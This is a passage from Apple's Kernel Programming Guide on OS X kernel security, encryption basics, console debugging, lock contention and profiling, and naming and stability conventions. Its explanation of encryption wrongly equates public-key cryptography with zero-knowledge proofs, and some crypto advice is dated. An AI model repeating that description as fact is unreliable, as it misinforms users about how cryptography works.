program’s user. /dev/mem and /dev/kmem One particularly painfulsurprise to people doing security programming in most UNIX or UNIX-like environments is the existence of /dev/mem and /dev/kmem. These device files allow the root user to arbitrarily access the contents of physical memory and kernel memory, respectively. There is absolutely nothing you can do to prevent this. From a kernel perspective, root is omnipresent and omniscient. If this is a security concern for your program, then you should consider whether your program should be used on a system controlled by someone else and take the necessary precautions. Security Considerations Temporary Files 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 31Note: Support for /dev/kmem is being phased out. It is not available on Intel-based Macintosh computers in OS X v10.4. In the future, it will be removed entirely. It is not possible to write device drivers that access PCI device memory through /dev/mem in OS X. If you need to support such a driver, you must write a kernel stub driver that matches against the device and mapsits memory space into the addressspace of the user process. For more information, read about user clients in I/O Kit Fundamentals. Key-based Authentication and Encryption Key-based authentication and encryption are ostensibly some of the more secure means of authentication and encryption, and can exist in many forms. The most common forms are based upon a shared secret. The DES, 3DES (triple-DES), IDEA, twofish, and blowfish ciphers are examples of encryption schemes based on a shared secret. Passwords are an example of an authentication scheme based on a shared secret. The idea behind most key-based encryption is that you have an encryption key of some arbitrary length that is used to encode the data, and that same key is used in the opposite manner (or in some cases, in the same manner) to decode the data. The problem with shared secret security is that the initial key exchange must occur in a secure fashion. If the integrity of the key is compromised during transmission, the data integrity is lost. This is not a concern if the key can be generated ahead of time and placed at both transport endpoints in a secure fashion. However, in many cases, this is not possible or practical because the two endpoints (be they physical devices or system tasks) are controlled by different people or entities. Fortunately, an alternative exists, known as zero-knowledge proofs. The concept of a zero-knowledge proof is that two seemingly arbitrary key values, x and y, are created, and that these values are related by some mathematical function ƒ in such a way that ƒ(ƒ(a,k1),k2) = a That is, applying a well-known function to the original cleartext using the first key results in ciphertext which, when that same function is applied to the ciphertext using the second key returns the original data. This is also reversible, meaning that ƒ(ƒ(a,k2),k1) = a Security Considerations Key-based Authentication and Encryption 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 32If the function f is chosen correctly, it is extremely difficult to derive x from y and vice-versa, which would mean that there is no function that can easily transform the ciphertext back into the cleartext based upon the key used to encode it. An example of this is to choose the mathematical function to be f(a,k)=((a*k) MOD 256) + ((a*k)/256) where a is a byte of cleartext, and k is some key 8 bits in length. This is an extraordinarily weak cipher, since the function f allows you to easily determine one key from the other, but it is illustrative of the basic concept. Pick k1 to be 8 and k2 to be 32. So for a=73, (a * 8)=584. This takes two bytes, so add the bits in the high byte to the bits of the low byte, and you get 74. Repeat this process with 32. This gives you 2368. Again, add the bits from the high byte to the bits of the low byte, and you have 73 again. This mathematical concept (with very different functions), when put to practical use, is known as public key (PK) cryptography, and forms the basis for RSA and DSA encryption. Public Key Weaknesses Public key encryption can be very powerful when used properly. However, it has a number of inherent weaknesses. A complete explanation of these weaknesses is beyond the scope of this document. However, it is important that you understand these weaknesses at a high level to avoid falling into some common traps. Some commonly mentioned weakness of public key cryptography include: ● Trust model for key exchange ● Pattern sensitivity ● Short data weakness Trust Models The most commonly discussed weakness of public key cryptography is the initial key exchange process itself. If someone manages to intercept a key during the initial exchange, he or she could instead give you his or her own public key and intercept messages going to the intended party. This is known as a man-in-the-middle attack. For such services as ssh, most people either manually copy the keys from one server to another or simply assume that the initial key exchange was successful. For most purposes, this is sufficient. In particularly sensitive situations, however, this is not good enough. For this reason, there is a procedure known as key signing. There are two basic models for key signing: the central authority model and the web of trust model. Security Considerations Key-based Authentication and Encryption 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 33The central authority model is straightforward. A central certifying agency signs a given key, and says that they believe the owner of the key is who he or she claims to be. If you trust that authority, then by association, you trust keys that the authority claims are valid. The web of trust model is somewhat different. Instead of a central authority, individuals sign keys belonging to other individuals. By signing someone’s key, you are saying that you trust that the person is really who he or she claims to be and that you believe that the key really belongs to him or her. The methods you use for determining that trust will ultimately impact whether others trust your signatures to be valid. There are many different ways of determining trust, and thus many groups have their own rulesfor who should and should not sign someone else’s key. Those rules are intended to make the trust level of a key depend on the trust level of the keys that have signed it. The line between central authorities and web of trust models is not quite as clear-cut as you might think, however. Many central authorities are hierarchies of authorities, and in some cases, they are actually webs of trust among multiple authorities. Likewise, many webs of trust may include centralized repositories for keys. While those repositories don’t provide any certification of the keys, they do provide centralized access. Finally, centralized authorities can easily sign keys as part of a web of trust. There are many websites that describe webs of trust and centralized certification schemes. A good general description of several such models can be found at http://world.std.com/~cme/html/web.html. Sensitivity to Patterns and Short Messages Existing public key encryption algorithms do a good job at encrypting semi-random data. They fallshort when encrypting data with certain patterns, as these patterns can inadvertently reveal information about the keys. The particular patterns depend on the encryption scheme. Inadvertently hitting such a pattern does not allow you to determine the private key. However, they can reduce the search space needed to decode a given message. Short data weakness is closely related to pattern sensitivity. If the information you are encrypting consists of a single number, for example the number 1, you basically get a value that is closely related mathematically to the public key. If the intent is to make sure that only someone with the private key can get the original value, you have a problem. In other words, public key encryption schemes generally do not encrypt all patterns equally well. For thisreason (and because public key cryptography tendsto be slower than single key cryptography), public keys are almost never used to encrypt end-user data. Instead, they are used to encrypt a session key. This session key is then used to encrypt the actual data using a shared secret mechanism such as 3DES, AES, blowfish, and so on. Security Considerations Key-based Authentication and Encryption 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 34Using Public Keys for Message Exchange Public key cryptography can be used in many ways. When both keys are private, it can be used to send data back and forth. However this use is no more useful than a shared secret mechanism. In fact, it is frequently weaker, for the reasons mentioned earlier in the chapter. Public key cryptography becomes powerful when one key is made public. Assume that Ernie and Bert want to send coded messages. Ernie gives Bert his public key. Assuming that the key was not intercepted and replaced with someone else’s key, Bert can now send data to Ernie securely, because data encrypted with the public key can only be decrypted with the private key (which only Ernie has). Bert uses this mechanism to send a shared secret. Bert and Ernie can now communicate with each other using a shared secret mechanism, confident in the knowledge that no third party has intercepted that secret. Alternately, Bert could give Ernie his public key, and they could both encrypt data using each other’s public keys, or more commonly by using those public keys to encrypt a session key and encrypting the data with that session key. Using Public Keys for Identity Verification Public key cryptography can also be used for verification of identity. Kyle wants to know if someone on the Internet who claims to be Stan is really Stan. A few months earlier, Stan handed Kyle his public key on a floppy disk. Thus, since Kyle already has Stan’s public key (and trusts the source of that key), he can now easily verify Stan’s identity. To achieve this, Kyle sends a cleartext message and asks Stan to encrypt it. Stan encrypts it with his private key. Kyle then uses Stan’s public key to decode the ciphertext. If the resulting cleartext matches, then the person on the other end must be Stan (unless someone else has Stan’s private key). Using Public Keys for Data Integrity Checking Finally, public key cryptography can be used for signing. Ahmed is in charge of meetings of a secret society called the Stupid Acronym Preventionists club. Abraham is a member of the club and gets a TIFF file containing a notice of their next meeting, passed on by way of a fellow member of the science club, Albert. Abraham is concerned, however, that the notice might have come from Bubba, who is trying to infiltrate the SAPs. Ahmed, however, was one step ahead, and took a checksum of the original message and encrypted the checksum with his private key, and sent the encrypted checksum as an attachment. Abraham used Ahmed’s public key to decrypt the checksum, and found that the checksum did not match that of the actual document. He wisely avoided the meeting. Isaac, however, was tricked into revealing himself as a SAP because he didn’t remember to check the signature on the message. Security Considerations Key-based Authentication and Encryption 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 35The moral of thisstory? One should always beware of geekssharing TIFFs—that is, if the security ofsome piece of data isimportant and if you do not have a direct,secure means of communication between two applications, computers, people, and so on, you must verify the authenticity of any communication using signatures, keys, or some other similar method. This may save your data and also save face. Encryption Summary Encryption is a powerful technique for keeping data secure if the initial key exchange occursin a secure fashion. One meansfor thisisto have a public key,stored in a well-known (and trusted) location. This allowsfor one-way encrypted communication through which a shared secret can be transferred for later two-way encrypted communication. You can use encryption not only for protecting data, but also for verifying the authenticity of data by encrypting a checksum. You can also use it to verify the identity of a client by requiring that the client encrypt some random piece of data as proof that the client holds the appropriate encryption key. Encryption, however, is not the final word in computer security. Because it depends on having some form of trusted key exchange, additional infrastructure is needed in order to achieve total security in environments where communication can be intercepted and modified. Console Debugging Warning: Failure to follow this advice can unintentionally expose security-critical information. In traditional UNIX and UNIX-like systems, the console is owned by root. Only root sees console messages. For this reason, print statements in the kernel are relatively secure. In OS X, any user can run the Console application. This represents a major departure from other UNIX-like systems. While it is never a good idea to include sensitive information in kernel debugging statements, it is particularly important not to do so in OS X. You must assume that any information displayed to the console could potentially be read by any user on the system (since the console is virtualized in the form of a user-viewable window). Printing any information involving sensitive data, including its location on disk or in memory, represents a security hole, however slight, and you should write your code accordingly. Obviously this is of less concern if that information is only printed when the user sets a debugging flag somewhere, but for normal use, printing potentially private information to the console is strongly discouraged. Security Considerations Console Debugging 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 36You must also be careful not to inadvertently print information that you use for generating password hashes or encryption keys, such as seed values passed to a random number generator. This is, by necessity, not a complete list of information to avoid printing to the console. You must use your own judgement when deciding whether a piece of information could be valuable if seen by a third party, and then decide if it is appropriate to print it to the console. Code Passing There are many ways of passing executable code into the kernel from user space. For the purposes of this section, executable code is not limited to compiled object code. It includes any instructions passed into the kernel that significantly affect control flow. Examples of passed-in executable code range from simple rules such as the filtering code uploaded in many firewall designs to bytecode uploads for a SCSI card. If it is possible to execute your code in user space, you should not even contemplate pushing code into the kernel. For the rare occasion where no other reasonable solution exists, however, you may need to pass some form of executable code into the kernel. This section explains some of the security ramifications of pushing code into the kernel and the level of verification needed to ensure consistent operation. Here are some guidelines to minimize the potential for security holes: 1. No raw object code. Direct execution of code passed in from user space is very dangerous. Interpreted languages are the only reasonable solution for this sort of problem, and even this is fraught with difficulty. Traditional machine code can’t be checked sufficiently to ensure security compliance. 2. Bounds checking. Since you are in the kernel, you are responsible for making sure that any uploaded code does not randomly access memory and does not attempt to do direct hardware access. You would normally make this a feature of the language itself, restricting access to the data element on which the bytecode is operating. 3. Termination checking. With very, very few exceptions, the language chosen should be limited to code that can be verified to terminate, and you should verify accordingly. If your driver is stuck in a tightly rolled loop, it is probably unable to do its job, and may impact overall system performance in the process. A language that does not allow (unbounded) loops (for example, allowing for but not while or goto could be one way to ensure termination. 4. Validity checking. Security Considerations Code Passing 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 37Your bytecode interpreter would be responsible for checking ahead for any potentially invalid operations and taking appropriate punitive actions against the uploaded code. For example, if uploaded code is allowed to do math, then proper protection must be in place to handle divide by zero errors. 5. Sanity checking. You should verify that the output is something remotely reasonable, if possible. It is not always possible to verify that the output is correct, but it is generally possible to create rules that prevent egregiously invalid output. For example, a network filter rule should output something resembling packets. If the checksums are bad, or if other information is missing or corrupt, clearly the uploaded code is faulty, and appropriate actions should be taken. It would be highly inappropriate for OS X to send out bad network traffic. In general, the more restrictive the language set, the lower the security risk. For example, interpreting simple network routing policies is less likely to be a security problem than interpreting packet rewriting rules, which is less likely to be an issue than running Java bytecode in the kernel. As with anything else, you must carefully weigh the potential benefits against the potential drawbacks and make the best decision given the information available. Security Considerations Code Passing 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 38Performance is a key aspect of any software system. Nowhere is this more true than in the kernel, where small performance problems tend to be magnified by repeated execution. For this reason, it is extremely important that your code be as efficient as possible. This chapter discusses the importance of low interrupt latency and fine-grained locking and tells you how to determine what portions of your code would benefit most from more efficient design. Interrupt Latency In OS X, you will probably never need to write code that runs in an interrupt context. In general, only motherboard hardware requires this. However, in the unlikely event that you do need to write code in an interrupt context, interrupt latency should be a primary concern. Interrupt latency refers to the delay between an interrupt being generated and an interrupt handler actually beginning to service that interrupt. In practice, the worst case interrupt latency is closely tied to the amount of time spent in supervisor mode (also called kernel mode) with interrupts off while handling some other interrupt. Low interrupt latency is necessary for reasonable overall performance, particularly when working with audio and video. In order to have reasonable soft real-time performance (for example, performance of multimedia applications), the interrupt latency caused by every device driver must be both small and bounded. OS X takes great care to bound and minimize interrupt latency for built-in drivers. It doesthis primarily through the use of interrupt service threads (also known as I/O service threads). When OS X takes an interrupt, the low-level trap handlers call up to a generic interrupt handling routine that clears the pending interrupt bit in the interrupt controller and calls a device-specific interrupt handler. That device-specific handler, in turn, sends a message to an interrupt service thread to notify it that an interrupt has occurred, and then the handler returns. When no further interrupts are pending, control returns to the currently executing thread. The next time the interrupt service thread is scheduled, it checks to see if an interrupt has occurred, then services the interrupt. As the name suggests, this actually is happening in a thread context, not an interrupt context. This design causes two major differences from traditional operating system design: ● Interrupt latency is near zero, since the code executing in an interrupt context is very small. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 39 Performance Considerations● It is possible for an interrupt to occur while a device driver is executing. This means that traditional (threaded) device drivers can be preempted and must use locking or other similar methods to protect any shared data (although they need to do so anyway to work on computers with multiple processors). This model is crucial to the performance of OS X. You should not attempt to circumvent this design by doing large amounts of work in an interrupt context. Doing so will be detrimental to the overall performance of the system. Locking Bottlenecks It is difficult to communicate data between multiple threads or between thread and interrupt contexts without using locking or other synchronization. This locking protects your data from getting clobbered by another thread. However, it also has the unfortunate side effect of being a potential bottleneck. In some types of communication (particularly n-way), locking can dramatically hinder performance by allowing only one thing to happen at a time. Read-write locks, discussed in “Synchronization Primitives” (page 128), can help alleviate this problem in the most common situation where multiple clients need to be able to read information but only rarely need to modify that data. However, there are many cases where read-write locks are not helpful. This section discusses some possible problems and ways of improving performance within those constraints. Working With Highly Contended Locks When many threads need to obtain a lock (or a small number of threads need to obtain a lock frequently), this lock is considered highly contended. Highly contended locks frequently represent faulty code design, but they are sometimes unavoidable. In those cases, the lock tends to become a major performance bottleneck. Take, for example, the issue of many-to-many communication that must be synchronized through a common buffer. While some improvement can be gained by using read-write locks instead of an ordinary mutex, the issue of multiple writers means that read-write locks still perform badly. One possible solution for this many-to-many communication problem is to break the lock up into multiple locks. Instead of sharing a single buffer for the communication itself, make a shared buffer that contains accounting information for the communication (for example, a list of buffers available for reading). Then assign each individual buffer its own lock. The readers might then need to check several locations to find the right data, but this still frequently yields better performance, since writers must only contend for a write lock while modifying the accounting information. Performance Considerations Locking Bottlenecks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 40Anothersolution for many-to-many communicationsisto eliminate the buffer entirely and communicate using message passing, sockets, IPC, RPC, or other methods. Yet another solution is to restructure your code in a way that the locking is unnecessary. This is often much more difficult. One method that is often helpful isto take advantage of flags and atomic increments, as outlined in the next paragraph. For simplicity, a single-writer, single-reader example is presented, but it is possible to extend this idea to more complicated designs. Take a buffer with some number of slots. Keep a read index and a write index into that buffer. When the write index and read index are the same, there is no data in the buffer. When writing, clear the next location. Then do an atomic increment on the pointer. Write the data. End by setting a flag at that new location that says that the data is valid. Note that this solution becomes much more difficult when dealing with multiple readers and multiple writers, and as such, is beyond the scope of this section. Reducing Contention by Decreasing Granularity One of the fundamental properties of locksis granularity. The granularity of a lock refersto the amount of code or data that it protects. A lock that protects a large block of code or a large amount of data is referred to as a coarse-grained lock, while a lock that protects only a small amount of code or data isreferred to as a fine-grained lock. A coarse-grained lock is much more likely to be contended (needed by one thread while being held by another) than a more finely grained lock. There are two basic ways of decreasing granularity. The first is to minimize the amount of code executed while a lock is held. For example, if you have code that calculates a value and stores it into a table, don’t take the lock before calling the function and release it after the function returns. Instead, take the lock in that piece of code right before you write the data, and release it as soon as you no longer need it. Of course, reducing the amount of protected code is not always possible or practical if the code needs to guarantee consistency where the value it is writing depends on other values in the table, since those values could change before you obtain the lock, requiring you to go back and redo the work. It is also possible to reduce granularity by locking the data in smaller units. In the above example, you could have a lock on each cell of the table. When updating cells in the table, you would start by determining the cells on which the destination cell depends, then lock those cells and the destination cell in some fixed order. (To avoid deadlock, you must always either lock cells in the same order or use an appropriate try function and release all locks on failure.) Once you have locked all the cells involved, you can then perform your calculation and release the locks, confident that no other thread has corrupted your calculations. However, by locking on a smaller unit of data, you have also reduced the likelihood of two threads needing to access the same cell. Performance Considerations Locking Bottlenecks 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 41A slightly more radical version of this is to use read-write locks on a per-cell basis and always upgrade in a particular order. This is, however, rather extreme, and difficult to do correctly. Code Profiling Code profiling means determining how often certain pieces of code are executed. By knowing how frequently a piece of code is used, you can more accurately gauge the importance of optimizing that piece of code. There are a number of good tools for profiling user space applications. However, code profiling in the kernel is a very different beast, since it isn’t reasonable to attach to it like you would a running process. (It is possible by using a second computer, but even then, it is not a trivial task.) This section describes two useful ways of profiling your kernel code: counters and lock profiling. Any changes you make to allow code profiling should be done only during development. These are not the sort of changes that you want to release to end users. Using Counters for Code Profiling The first method of code profiling is with counters. To profile a section of code with a counter, you must first create a global variable whose name describesthat piece of code and initialize it to zero. You then add something like #ifdef PROFILING foo_counter++; #endif in the appropriate piece of code. If you then define PROFILING, that counter is created and initialized to zero, then incremented each time the code in question is executed. One small snag with this sort of profiling is the problem of obtaining the data. This can be done in several ways. The simplest is probably to install a sysctl, using the address of foo_counter as an argument. Then, you could simply issue the sysctl command from the command line and read or clear the variable. Adding a sysctl is described in more detail in “BSD sysctl API ” (page 117). In addition to using sysctl, you could also obtain the data by printing its value when unloading the module (in the case of a KEXT) or by using a remote debugger to attach to the kernel and directly inspecting the variable. However, a sysctl provides the most flexibility. With a sysctl, you can sample the value at any time, not just when the module is unloaded. The ability to arbitrarily sample the value makes it easier to determine the importance of a piece of code to one particular action. Performance Considerations Code Profiling 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 42If you are developing code for use in the I/O Kit, you should probably use your driver’s setProperties call instead of a sysctl. Lock Profiling Lock profiling is another useful way to find the cause of code inefficiency. Lock profiling can give you the following information: ● how many times a lock was taken ● how long the lock was held on average ● how often the lock was unavailable Put another way, this allows you to determine the contention of a lock, and in so doing, can help you to minimize contention by code restructuring. There are many different ways to do lock profiling. The most common way is to create your own lock calls that increment a counter and then call the real locking functions. When you move from debugging into a testing cycle before release, you can then replace the functions with defines to cause the actual functions to be called directly. For example, you might write something like this: extern struct timeval time; boolean_t mymutex_try(mymutex_t *lock) { int ret; ret=mutex_try(lock->mutex); if (ret) { lock->tryfailcount++; } return ret; } void mymutex_lock(mymutex_t *lock) { if (!(mymutex_try(lock))) { mutex_lock(lock->mutex); } lock->starttime = time.tv_sec; } void mymutex_unlock(mymutex_t *lock) { Performance Considerations Code Profiling 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 43lock->lockheldtime += (time.tv_sec - lock->starttime); lock->heldcount++; mutex_unlock(lock->mutex); } This routine has accuracy only to the nearest second, which is not particularly accurate. Ideally, you want to keep track of both time.tv_sec and time.tv_usec and roll the microseconds into seconds as the number gets large. From this information, you can obtain the average time the lock was held by dividing the total time held by the number of times it was held. It also tells you the number of times a lock was taken immediately instead of waiting, which is a valuable piece of data when analyzing contention. As with counter-based profiling, after you have written code to record lock use and contention, you must find a way to obtain that information. A sysctl is a good way of doing this, since it is relatively easy to implement and can provide a “snapshot” view of the data structure at any point in time. For more information on adding a sysctl, see “BSD sysctl API ” (page 117). Another way to do lock profiling isto use the built-in ETAP (Event Trace Analysis Package). This package consists of additional code designed for lock profiling. However, since this requires a kernel recompile, it is generally not recommended. Performance Considerations Code Profiling 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 44As described in “Keep Out” (page 13), programming in the kernel is fraught with hazards that can cause instability, crashes, or security holes. In addition to these issues, programming in the kernel has the potential for compatibility problems. If you program only to the interfaces discussed in this document or other Apple documents, you will avoid the majority of these. However, even limiting yourself to documented interfaces does not protect you from a handful of pitfalls. The biggest potential problem that you face is namespace collision, which occurs when your function, variable, or class name is the same as someone else’s. Since this makes one kernel extension or the other fail to load correctly (in a non-deterministic fashion), Apple has established function naming conventions for C and C++ code within the kernel. These are described in “Standard C Naming Conventions” (page 47) and “C++ Naming Conventions” (page 45), respectively. In addition to compatibility problems, kernel extensions that misbehave can also dramatically decrease the system’s overall performance or cause crashes. Some of these issues are described in “Performance and Stability Tips” (page 50). For more thorough coverage of performance and stability, you should also read the chapters “Security Considerations” (page 24) and “Performance Considerations” (page 39). C++ Naming Conventions Basic I/O Kit C++ naming conventions are defined in the document I/O Kit Device Driver Design Guidelines. This section refines those conventions in ways that should make them more useful to you as a programmer. Basic Conventions The primary conventions are as follows: ● Use the Java-style reverse DNS naming convention, substituting underscores for periods. For example, com_apple_foo. ● Avoid the following reserved prefixes: ● OS ● os ● IO ● io 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 45 Kernel Programming Style● Apple ● apple ● AAPL ● aapl This ensures that you will not collide with classes created by other companies or with future classes added to the operating system by Apple. It does not protect you from other projects created within your company, however, and for this reason, some additional guidelines are suggested. Additional Guidelines These additional guidelines are intended to minimize the chance of accidentally breaking your own software and to improve readability of code by developers. ● To avoid namespace collisions, you should prefix the names of classes and families with project names or other reasonably unique prefix codes. For example, if you are working on a video capture driver, and one of its classes is called capture, you will probably encounter a name collision eventually. Instead, you should name the class something like com_mycompany_driver_myproduct_capture. Similarly, names like To maximize readability, you should use macros to rename classes and families at compile time. For example: #define captureClass com_mycompany_driver_myproduct_capture #define captureFamily com_mycompany_iokit_myproduct_capture ● Use prefixes in function and method names to make it easier to see relationships between them. For example, Apple uses NS, CF, IO, and other prefixesto indicate that functions belong to specific frameworks. This might be as simple as prefixing a function with the name of the enclosing or related class, or it might be some other scheme that makes sense for your project. These are only suggested guidelines. Your company or organization should adopt its own set of guidelines within the constraints of the basic conventions described in the previous section. These guidelines should provide a good starting point. Kernel Programming Style C++ Naming Conventions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 46Standard C Naming Conventions The naming conventionsfor C++ have been defined forsome time in the document I/O Kit Device Driver Design Guidelines. However, no conventions have been given for standard C code. Because standard C has an even greater chance of namespace collision than C++, it is essential that you follow these guidelines when writing C code for use in the kernel. Because C does not have the benefit of classes, it is much easier to run into a naming conflict between two functions. For this reason, the following conventions are suggested: ● Declare all functions and (global) variables static where possible to prevent them from being seen in the global namespace. If you need to share these across files within your KEXT, you can achieve a similar effect by declaring them __private_extern__. ● Each function name should use Java-style reverse DNS naming. For example, if your company is apple.com, you should begin each function with com_apple_. ● Follow the reverse DNS name with the name of your project. For example, if you work at Apple and were working on project Schlassen, you would start each function name (in drivers) with com_apple_driver_schlassen_. Note: The term driver is reserved for actual device drivers. For families, you should instead use iokit. For example, if project Schlassen is an I/O Kit family, function namesshould all begin with com_apple_iokit_schlassen_. ● Use hierarchical names if you anticipate multiple projects with similar names coming from different parts of your company or organization. ● Use macro expansion to save typing, for example PROJECT_eat could expand to com_apple_driver_schlassen_pickle_eat. ● If you anticipate that the last part of a function name may be the same as the last part of another function name (for example, PROJECT1_eat and PROJECT2_eat), you should change the namesto avoid confusion (for example, PROJECT1_eatpickle and PROJECT2_eatburger). ● Avoid the following reserved prefixes: ● OS ● os ● IO ● io ● Apple ● apple Kernel Programming Style Standard C Naming Conventions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 47● AAPL ● aapl ● Avoid conflicting with any names already in the kernel, and do not use prefixes similar to those of existing kernel functions that you may be working with. ● Never begin a function name with an underscore (_). ● Under no circumstances should you use common names for your functions without prefixing them with the name of your project in some form. These are some examples of unacceptable names: ● getuseridentity ● get_user_info ● print ● find ● search ● sort ● quicksort ● merge ● console_log In short, picking any name that you would normally pick for a function is generally a bad idea, because every other developer writing code is likely to pick the same name for his or her function. Occasional conflicts are a fact of life. However, by following these few simple rules, you should be able to avoid the majority of common namespace pitfalls. Commonly Used Functions One of the most common problems faced when programming in the kernel is use of “standard” functions—things like printf or bcopy. Many commonly used standard C library functions are implemented in the kernel. In order to use them, however, you need to include the appropriate prototypes, which may be different from the user space prototypes for those functions, and which generally have different names when included from kernel code. In general, any non–I/O Kit header that you can safely include in the kernel is located in xnu/bsd/sys or xnu/osfmk/mach, although there are a few specialized headers in other places like libkern and libsa. Normal headers (those in /usr/include) cannot be used in the kernel. Kernel Programming Style Commonly Used Functions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 48Important: If you are writing an I/O Kit KEXT, most of these functions are not what you are looking for. The I/O Kit providesits own APIsfor these features, including IOLog, IOMemoryDescriptor, and IOLock. While using the lower-level functionality is not expressly forbidden, it is generally discouraged (though printf is always fine). For more information about APIs available to I/O Kit KEXTs, see Kernel Framework Reference . Table 7-1 (page 49) lists some commonly used C functions, variables, and types, and gives the location of their prototypes. Table 7-1 Commonly used C functions Function name Header path printf Buffer cache functions (bread, bwrite, and brelse) Directory entries Error numbers Kernel special variables Spinlocks malloc Queues Random number generator bzero, bcopy, copyin, and copyout timeout and untimeout Various time functions Standard type declarations User credentials OS and system information If the standard C function you are trying to use is not in one of these files, chances are the function is not supported for use within the kernel, and you need to implement your code in another way. Kernel Programming Style Commonly Used Functions 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 49The symbols in these header files are divided among multiple symbol sets, depending on the technology area where they were designed to be used. To use these, you may have to declare dependencies on any of the following: ● com.apple.kernel—You should generally avoid this. ● com.apple.kernel.bsd—BSD portions of the kernel. ● com.apple.kernel.iokit—The I/O Kit. ● com.apple.kernel.libkern—General-purpose functions. ● com.apple.kernel.mach—Mach-specific APIs. ● com.apple.kpi.bsd—BSD portions of the kernel (v10.4 and later). ● com.apple.kernel.iokit—The I/O Kit (v10.4 and later). ● com.apple.kernel.libkern—General-purpose functions (v10.4 and later). ● com.apple.kernel.mach—Mach-specific APIs (v10.4 and later). ● com.apple.kpi.unsupported—Unsupported legacy functionality (v10.4 and later). Where possible, you should specify a dependency on the KPI version of these symbols. However, these symbols are only available in v10.4 and later. For the I/O Kit and libkern, this should make little difference. For other areas, such as network kernel extensions or file system KEXTs, you must use the KPI versions if you want your extension to load in OS X v10.4 and later. For a complete list of symbols in any of these dependencies, run nm on the binaries in /System/Library/Extensions/System.kext/PlugIns. Performance and Stability Tips This section includes some basic tips on performance and stability. You should read the sections on security and performance for additional information. These tips cover only style issues, not general performance or stability issues. Performance and Stability Tips Programming in the kernel is subject to a number of restrictions that do not exist in application programming. The first and most important is the stack size. The kernel has a limited amount of space allocated for thread stacks, which can cause problems if you aren’t aware of the limitation. This means the following: ● Recursion must be bounded (to no more than a few levels). ● Recursion should be rewritten as iterative routines where possible. Kernel Programming Style Performance and Stability Tips 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 50● Large stack variables(function local) are dangerous. Do not use them. This also appliesto large local arrays. ● Dynamically allocated variables are preferred (using malloc or equivalent) over local variables for objects more than a few bytes in size. ● Functions should have as few arguments as possible. ● Pass pointers to structures, not the broken out elements. ● Don’t use arguments to avoid using global or class variables. ● Do name global variables in a way that protects you from collision. ● C++ functions should be declared static. ● Functions not obeying these rules can cause a kernel panic, or in extreme cases, do not even compile. In addition to issues of stack size, you should also avoid doing anything that would generate unnecessary load such as polling a device or address. A good example is the use of mutexes rather than spinlocks. You should also structure your locks in such a way to minimize contention and to minimize hold times on the most highly contended locks. Also, since unused memory (and particularly wired memory) can cause performance degradation, you should be careful to deallocate memory when it is no longer in use, and you should never allocate large regions of wired memory. This may be unavoidable in some applications, but should be avoided whenever possible and disposed of at the earliest possible opportunity. Allocating large contiguous blocks of memory at boot time is almost never acceptable, because it cannot be released. There are a number of issues that you should consider when deciding whether to use floating point math or AltiVec vector math in the kernel. First, the kernel takes a speed penalty whenever floating-point math or AltiVec instructions are used in a system call context (or other similar mechanisms where a user thread executes in a kernel context), as floating-point and AltiVec registers are only maintained when they are in use. Note: In cases where altivec or floating point has already been used in user space in the calling thread, there is no additional penalty for using them in the kernel. Thus, for things like audio drivers, the above does not apply. In general, you should avoid doing using floating-point math or AltiVec instructions in the kernel unless doing so will result in a significant speedup. It is not forbidden, but is strongly discouraged. Second, AltiVec was not supported in the kernel prior to OS X v10.3. It was not possible to detect this support from within the kernel until a later 10.3 software update. If you must deploy your KEXT on earlier versions of OS X, you must either provide a non-AltiVec version of your code or perform the AltiVec instructions in user space. Kernel Programming Style Performance and Stability Tips 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 51Finally, AltiVec data stream instructions (dst, dstt, dstst, dss, and dssall) are not supported in the kernel, even for processors that support them in user space. Do not attempt to use them. If you decide to use AltiVec in the kernel, your code can determine whether the CPU supports AltiVec using the sysctlbyname call to get the hw.optional.altivec property. For more information, see “The sysctlbyname System Call” (page 123). Stability Tips ● Don’tsleep while holding resources(locks, for example). While thisis not forbidden, it isstrongly discouraged to avoid deadlock. ● Be careful to allocate and free memory with matching calls. For example, do not use allocation routines from the I/O Kit and deallocation routines from BSD. Likewise, do not use IOMallocContiguous with IOFreePageable. ● Use reference counts to avoid freeing memory that is still in use elsewhere. Be sure to deallocate memory when its reference count reaches zero, but not before. ● Lock objects before operating on them, even to change reference counts. ● Never dereference pointers without verifying that they are not NULL. In particular, never do this: int foo = *argptr; unless you have already verified that argptr cannot possibly be NULL. ● Test code in sections and try to think up likely edge cases for calculations. ● Never assume that your code will be run only on big endian processors. ● Never assume that the size of an instance of a type will never change. Always use sizeof if you need this information. ● Never assume that a pointer will always be the same size as an int or long. Style Summary Kernel programming style is very much a matter of personal preference, and it is not practical to programmatically enforce the guidelines in this chapter. However, we strongly encourage you to follow these guidelines to the maximum extent possible. These guidelines were created based on frequent problems reported by developers writing code in the kernel. No one can force you to use good style in your programming, but if you do not, you do so at your own peril. Kernel Programming Style Style Summary 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 52The fundamental services and primitives of the OS X kernel are based on Mach 3.0. Apple has modified and extended Mach to better meet OS X functional and performance goals. Mach 3.0 was originally conceived as a simple, extensible, communications microkernel. It is capable of running as a stand–alone kernel, with other traditional operating-system servicessuch asI/O, file systems, and networking stacks running as user-mode servers. However, in OS X, Mach is linked with other kernel components into a single kernel address space. This is primarily for performance; it is much faster to make a direct call between linked components than it is to send messages or do remote procedure calls (RPC) between separate tasks. This modular structure results in a more robust 